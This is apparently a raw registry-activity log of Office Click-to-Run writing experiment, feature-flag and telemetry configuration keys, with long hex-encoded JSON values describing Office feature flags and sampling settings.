1626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e417261626963456e746572707269736547726f757032222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4272617a696c69616e436f6e74726163746564507265706f736974696f6e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4272617a696c69616e456e744469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4272617a696c69616e496e636f727265637453657175656e63654f66507265706f736974696f6e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4475746368456e746572707269736547726f757032222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e456e676c697368456e7452616369616c426961734361706974616c697a6174696f6e6f6641626f726967696e616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e456e676c697368456e7452616369616c426961734361706974616c697a6174696f6e6f66426c61636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e456e676c697368456e7452616369616c426961734361706974616c697a6174696f6e6f66496e646967656e6f7573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e456e676c697368456e74536f63696f65636f6e6f6d6963426961734e6577222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e46696e6e697368456e74416765416e644469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4672656e6368456e746572707269736547726f757033222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4974616c69616e4361706974616c697a6174696f6e4f66436f6d6d6f6e4e6f756e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4e6f7277656769616e426f6b6d61616c456e746572707269736547726f757031222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e53776564697368456e746572707269736547726f757031222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e5475726b697368456e746572707269736547726f757033222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f72744865647769675558 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\RemoteClearDate = 0040a7e3a36bc901 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\0 OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.8 = 222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f7274496e73657274416c6c4f626a6563747356696577222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f72744f75746c6f6f6b496e7365727446696c65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e47726170686963732e4368616e6765476174652e5570646174655461626c65426f756e6473466f72547970696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4943726974697175652e4c6f674772616d6d6172466c61674564697473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4c6173744d696c654661636164652e46656174757265466c69676874222c20225622203a2022696e7436345f747c3722207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4c6173744d696c6554656c656d657472792e46656174757265466c69676874222c20225622203a2022696e7436345f747c3722207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4c6173744d696c6554656c656d657472792e46656174757265466c69676874456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50726f6f66696e672e4175746f4d616e616765722e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e54686573617572757350616e652e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e4368616e6765476174652e52656672657368547970656661636543616368655768656e4c697374416c6c4f6e4469736b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e436f6c6f72466f6e74537570706f7274456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e48696464656e466f6e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e53686f756c64436f6e766572744c6567616379456e636f64656453796d626f6c43686172616374657273222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e536b697048696464656e436c6f7564466f6e7473496e457863656c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e5472616e7363726962652e436f6e666967436865636b44697361626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e556961506c616365486f6c64657253746f7279466978222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e55706772616465546f466f6e74536572766963653163646e456e64706f696e74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e557365466f6e744c696e6b5633222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c655265676973746572536f757263654578656375746543616c6c6261636b416c77617973222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e416461707469766553616d706c696e67222c20225622203a20227374643a3a77737472696e677c7b205c22436f6e666967315c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e666967325c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e666967335c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e666967345c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e666967355c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e666967365c22203a207b205c224576656e744672657175656e63795c22203a205c224c6573735468616e506f696e745a65726f466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e666967375c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e666967385c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e666967395c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20323030207d2c205c22436f6e66696731305c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203230207d2c205c22436f6e66696731315c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696731325c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e745a65726f46697665546f4c6573735468616e506f696e744f6e655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032207d2c205c22436f6e66696731335c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e66696731345c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032303030207d2c205c22436f6e66696731355c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696731365c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696731375c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696731385c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e744f6e65546f4c6573735468616e506f696e7454776f466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696731395c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130303030207d2c205c22436f6e66696732305c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e66696732315c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a20313030207d2c205c22436f6e66696732325c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696732335c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696732345c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7454776f46697665546f4c6573735468616e506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696732355c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032303030207d2c205c22436f6e66696732365c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e66696732375c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203230207d2c205c22436f6e66696732385c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032207d2c205c22436f6e66696732395c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696733305c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e7446697665546f4c6573735468616e506f696e74536576656e5c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696733315c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e66696733325c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f54776f5c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f6e66696733335c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e744f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a203130207d2c205c22436f6e66696733345c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e7454776f466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2032207d2c205c22436f6e66696733355c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e74466976655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031207d2c205c22436f6e66696733365c22203a207b205c224576656e744672657175656e63795c22203a205c22506f696e74536576656e546f4c6573735468616e4f6e65506f696e7454687265655c222c205c224d617267696e4f664572726f725c22203a205c224f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2030207d2c205c22436f6e66696733375c22203a207b205c224576656e744672657175656e63795c22203a205c224f6e65506f696e745468726565546f4c6573735468616e54776f506f696e74466976655c222c205c224d617267696e4f664572726f725c22203a205c22506f696e745a65726f4f6e655c222c205c2253616d706c655261746550657254656e54686f7573616e645c22203a2031303030207d2c205c22436f OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\FlightCacheProviderId OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|20" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|17" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates OfficeClickToRun.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133785008137280812" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=1033&build=16.0.18227&crev=3\Last = "0" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 = 6d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e63496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e6352657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e745374617465496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e74537461746552657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655265747279496e6e65724c6f6f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f61646361737465725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253686172696e6755495c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f6c6c616250616e65557365725c22203a207b205c224576656e74735c22203a207b205c22536861726550616e65436f6d706c657465446973706c61795c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253686172654469616c6f675c22203a207b205c224576656e74735c22203a207b205c224e61766967617465546f5765624469616c6f675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e6441734174746163686d656e745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c224544505c22203a207b205c224576656e74735c22203a207b205c22506f6c6963794d657461646174615c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c225369746573536572766963654170695c22203a207b205c224576656e74735c22203a207b205c22526571756573744173796e635c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265616446726f6d43616368655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d2c205c224576656e74735c22203a207b205c224544502a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e44796e616d696343616e766173222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224f7574537061636543616e7661735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2250726f677265737355695c22203a207b205c224576656e74735c22203a207b205c22556e6578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2243616e7661735c22203a207b205c225375624e616d657370616365735c22203a207b205c225765624469616c6f675c22203a207b205c225375624e616d657370616365735c22203a207b205c2242726f777365724576656e7448616e646c65725c22203a207b205c224576656e74735c22203a207b205c224f6e4c6f616465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224e617669676174696f6e48616e646c65725c22203a207b205c224576656e74735c22203a207b205c224f6e4e61766967617465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e457863656c222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436f617574685c22203a207b205c224576656e74735c22203a207b205c22457865637574654d65726765496e7374616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224b69636b4f6666517569636b536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22586c53796e6353746174654368616e67654c697374656e65724f6e53796e6353746174654368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f63734765744f70496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c6f7365576f726b626f6f6b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224261636b67726f756e6451756575655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e4765745265766973696f6e436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e4765745265766973696f6e526573706f6e736552656365697665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f70464275696c644765745265766973696f6e526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b5061636b61676546696c6553746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b5061636b61676546696c6553746f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b456e637279707465644d6574726f46696c6553746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b456e637279707465644d6574726f46696c6553746f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536b697070656443686743656c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243717532674872446f456e74657243656c6c466d6c61584c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436f6d6d616e645c22203a207b205c224576656e74735c22203a207b205c2252656672657368416c6c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22526566457874446174615c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2246696c65536176655c22203a207b205c224576656e74735c22203a207b205c225361766541735361766546696c655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2243616c635c22203a207b205c224576656e74735c22203a207b205c224669784d616e75616c43616c634f6e4c6f61645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4578706572696d656e746174696f6e222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224564676546657463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164696e67466972737453657373696f6e43616368655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744665617475726573466f72534458556e65787065637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224142436f6e66696754726561746d656e7454797065556e65787065637465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e457874656e736962696c697479222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224f73664170704d657461646174615c22203a207b205c224576656e74735c22203a207b205c22456e73757265494f7366536f6c7574696f6e4d616e69666573745c22203a207b205c224576656e74466c61675c22203a20302c205c2253616d706c696e67506f6c6963795c22203a20332c205c224576656e744672657175656e63795c22203a20362c205c224d617267696e4f664572726f725c22203a2032207d2c205c2254616f73536f757263654c6f6164536f7572636564446174615c22203a207b205c224576656e74466c61675c22203a20302c205c2253616d706c696e67506f6c6963795c22203a20332c205c224576656e744672657175656e63795c22203a20362c205c224d617267696e4f664572726f725c22203a2032207d207d207d2c205c22446973636f7665725472794275795c22203a207b205c225375624e616d657370616365735c22203a207b205c2250795c22203a207b205c224576656e74735c22203a207b205c2253657276657244726976656e4e6f74696669636174696f6e55736572416374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253657276657244726976656e4e6f74696669636174696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c22436174616c6f675c22203a207b205c224576656e74735c22203a207b205c2245786368616e67654765744c617374557064617465325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547279446973636f76657245777355726c735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245786368616e67654765744c6173745570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547279446973636f76657245777355726c73325c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2254727948616e646c6541757468656e7469636174696f6e526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245786368616e6765476574456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c222